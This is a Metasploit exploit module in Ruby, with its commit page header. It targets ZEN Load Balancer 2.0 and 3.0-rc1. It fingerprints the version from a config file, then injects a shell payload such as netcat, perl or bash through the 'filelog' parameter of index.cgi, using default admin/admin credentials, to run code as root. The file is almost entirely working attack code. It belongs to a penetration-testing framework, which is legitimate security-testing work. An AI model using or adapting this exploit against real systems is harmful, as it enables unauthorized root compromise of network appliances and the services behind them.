wchen-r7
4f903a604c
Fix #5103. By default, Httpclient will encode the URI but we don't necessarily want that. These modules originally didn't use URI encoding when they were written so we should just keep them that way.
121 lines
3.6 KiB
Ruby
121 lines
3.6 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "ZEN Load Balancer Filelog Command Execution",
|
|
'Description' => %q{
|
|
This module exploits a vulnerability in ZEN Load Balancer
|
|
version 2.0 and 3.0-rc1 which could be abused to allow authenticated users
|
|
to execute arbitrary code under the context of the 'root' user.
|
|
The 'content2-2.cgi' file uses user controlled data from the 'filelog'
|
|
parameter within backticks.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
|
|
],
|
|
'References' =>
|
|
[
|
|
['OSVDB', '85654'],
|
|
['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/']
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'ExitFunction' => 'none'
|
|
},
|
|
'Platform' => 'unix',
|
|
'Arch' => ARCH_CMD,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 1024,
|
|
'BadChars' => "\x00",
|
|
'DisableNops' => true,
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd',
|
|
'RequiredCmd' => 'generic netcat netcat-e perl bash',
|
|
}
|
|
},
|
|
'Targets' =>
|
|
[
|
|
['Automatic Targeting', { 'auto' => true }]
|
|
],
|
|
'Privileged' => true,
|
|
'DisclosureDate' => "Sep 14 2012",
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(444),
|
|
OptBool.new('SSL', [true, 'Use SSL', true]),
|
|
OptString.new('USERNAME', [true, 'The username for the application', 'admin']),
|
|
OptString.new('PASSWORD', [true, 'The password for the application', 'admin'])
|
|
], self.class)
|
|
end
|
|
|
|
def check
|
|
# retrieve software version from config file
|
|
vprint_status("#{peer} - Sending check")
|
|
begin
|
|
res = send_request_cgi({
|
|
'uri' => '/config/global.conf'
|
|
})
|
|
|
|
if res and res.code == 200 and res.body =~ /#version ZEN\s+\$version=\"(2|3\.0\-rc1)/
|
|
return Exploit::CheckCode::Appears
|
|
elsif res and res.code == 200 and res.body =~ /zenloadbalancer/
|
|
return Exploit::CheckCode::Detected
|
|
end
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
vprint_error("#{peer} - Connection failed")
|
|
return Exploit::CheckCode::Unknown
|
|
end
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
|
|
def exploit
|
|
user = datastore['USERNAME']
|
|
pass = datastore['PASSWORD']
|
|
cmd = Rex::Text.uri_encode(";#{payload.encoded}&")
|
|
lines = rand(100) + 1
|
|
|
|
# send payload
|
|
print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
|
|
begin
|
|
res = send_request_cgi({
|
|
'uri' => '/index.cgi',
|
|
'authorization' => basic_auth(user, pass),
|
|
'encode_params' => false,
|
|
'vars_get' => {
|
|
'nlines' => lines,
|
|
'action' => 'See logs',
|
|
'id' => '2-2',
|
|
'filelog' => cmd
|
|
}
|
|
}, 25)
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
fail_with(Failure::Unreachable, 'Connection failed')
|
|
rescue
|
|
fail_with(Failure::Unknown, 'Sending payload failed')
|
|
end
|
|
|
|
if res and res.code == 401
|
|
fail_with(Failure::NoAccess, 'Authentication failed')
|
|
end
|
|
|
|
end
|
|
|
|
end
|